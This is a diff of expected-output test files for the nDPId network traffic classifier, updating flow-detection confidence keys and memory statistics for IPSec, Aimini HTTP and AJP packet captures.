-00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587338929051,"flow_last_seen":1587338929075,"flow_idle_time":200000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1532,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1587338931051} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870677 bytes -~~ total memory freed........: 5870677 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6004311 bytes +~~ total memory freed........: 6004311 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 917 chars diff --git a/test/results/aimini-http.pcap.out b/test/results/aimini-http.pcap.out index 925d308ae..718b9ac70 100644 --- a/test/results/aimini-http.pcap.out +++ b/test/results/aimini-http.pcap.out @@ -4,26 +4,26 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/member\/signup\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/member\/signup\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":139,"packets-processed":133,"total-skipped-flows":0,"total-l4-payload-len":79130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1614860229390} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 139/133 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877316 bytes -~~ total memory freed........: 5877316 bytes -~~ total allocations/frees...: 118275/118275 +~~ total memory allocated....: 6010950 bytes +~~ total memory freed........: 6010950 bytes +~~ total allocations/frees...: 121037/121037 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 970 chars diff --git a/test/results/ajp.pcap.out b/test/results/ajp.pcap.out index 32068be12..e97d4bf74 100644 --- a/test/results/ajp.pcap.out +++ b/test/results/ajp.pcap.out @@ -6,7 +6,7 @@ 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 